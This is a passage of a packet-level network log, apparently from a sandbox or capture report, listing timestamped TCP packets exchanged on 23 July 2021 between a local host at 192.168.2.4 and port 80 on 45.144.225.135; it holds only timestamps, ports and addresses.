Jul 23, 2021 22:24:24.828299999 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.828318119 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.828382969 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.828439951 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.828469992 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.828495979 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.828519106 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.828520060 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.828541994 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.828563929 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.828583956 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.828722000 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.828856945 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.828881025 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.828906059 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.828928947 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.828946114 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.828954935 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.828963995 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.828975916 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.829000950 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.829010963 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.829022884 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.829045057 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.829058886 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.829067945 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.829090118 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.829101086 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.829117060 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.829139948 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.829147100 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.829163074 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.829180002 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.829339981 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.829361916 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.829385042 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.829408884 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.829428911 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.829452038 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.829474926 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.829499960 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.829523087 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.829545975 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.829554081 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.829561949 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.829562902 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.829567909 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.829588890 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.829612970 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.829636097 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.829652071 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.829655886 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.829668045 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.829670906 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.829673052 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.829683065 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.829705954 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.829726934 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.829749107 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.829756975 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.829772949 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.829776049 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.829796076 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.829797029 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.829821110 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.829832077 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.829842091 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.829864979 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.829888105 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.829902887 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.829907894 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.829925060 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.829931974 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.829956055 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.829977989 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.829999924 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.830005884 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.830024004 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.830029011 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.830055952 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.830080032 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.830101013 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.830111980 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.830122948 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.830130100 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.830147982 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.830168009 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.830169916 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.830194950 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.830216885 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.830218077 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.830243111 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.830260038 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.830272913 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.830293894 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.830321074 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.830323935 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.830343008 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.830365896 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.830375910 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.830389023 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.830406904 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.830411911 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.830435038 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.830459118 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.830480099 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.830488920 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.830499887 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.830504894 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.830528975 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.830552101 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.830560923 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.830574989 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.830596924 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.830600977 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.830620050 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.830641985 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.830645084 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.830672979 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.830694914 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.830696106 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.830717087 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.830739021 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.830739975 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.830765009 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.830785036 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.830790043 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.830811977 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.830835104 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.830842018 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.830857992 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.830877066 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.830878019 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.830898046 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.830918074 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.830919981 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.830948114 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.830974102 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.830974102 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.830996990 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.831021070 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.831023932 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.831043959 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.831063986 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.831065893 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.831088066 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.831109047 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.831111908 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.831156015 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.831182003 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.831207037 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.831213951 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.831228971 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.831232071 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.831253052 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.831274986 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.831289053 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.831295013 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.831315994 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.831317902 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.831340075 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.831366062 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.831382990 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.831388950 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.831410885 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.831414938 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.831429958 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.831450939 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.831451893 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.831474066 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.831490993 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.831497908 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.831520081 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.831538916 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.831545115 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.831569910 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.831583023 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.831592083 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.831614971 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.831629038 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.831633091 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.831651926 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.831671953 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.831676006 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.831696033 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.831711054 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.831722021 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.831747055 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.831763983 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.831769943 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.831792116 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.831809044 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.831813097 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.831856012 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.833874941 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.833899021 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.833924055 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.833945990 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.833965063 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.833972931 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.833985090 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.834045887 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.834074974 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.836608887 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.836698055 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.836715937 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.836726904 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.836739063 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.836767912 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.836817980 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.836837053 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.836864948 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.836889029 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.836899042 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.836911917 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.836931944 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.836939096 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.836952925 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.836996078 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.847459078 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.847527027 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.847533941 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.847553968 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.847572088 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.847590923 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.859462023 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.859560013 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.859610081 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.859651089 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.859669924 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.859688044 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.859703064 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.859718084 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.859728098 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.859735012 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.859751940 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.859759092 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.859766960 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.859781981 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.859801054 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.859812021 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.859818935 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.859836102 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.859843016 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.859852076 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.859867096 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.859875917 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.859878063 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.859890938 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.859906912 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.859920025 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.859951973 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.860150099 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.860167980 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.860182047 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.860197067 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.860213041 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.860213041 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.860228062 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.860240936 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.860243082 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.860260010 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.860275984 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.860337973 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.861063957 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.861083984 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.861099958 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.861115932 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.861129045 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.861133099 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.861148119 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.861159086 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.861164093 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.861179113 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.861208916 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.861228943 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.861293077 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.861334085 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.861366987 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.861377954 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.861404896 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.861438036 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.861449957 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.861466885 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.861494064 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.861510992 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.861526012 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.861547947 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.861576080 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.861577034 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.861605883 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.861618042 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.861638069 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.861661911 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.861681938 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.861691952 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.861716032 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.861732960 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.861745119 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.861768007 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.861790895 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.861798048 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.861820936 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.861850977 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.861856937 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.861881018 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.861890078 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.861907005 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.861931086 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.861942053 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.861958981 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.861983061 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.861994982 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.864892960 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.864936113 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.864973068 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.864974976 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.865009069 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.865020037 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.865042925 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.865076065 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.865077019 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.865108967 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.865139961 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.865142107 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.865166903 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.865185022 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.865216970 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.865226030 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.865250111 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.865256071 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.865279913 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.865314007 CEST	80	49750	45.144.225.135	192.168.2.4
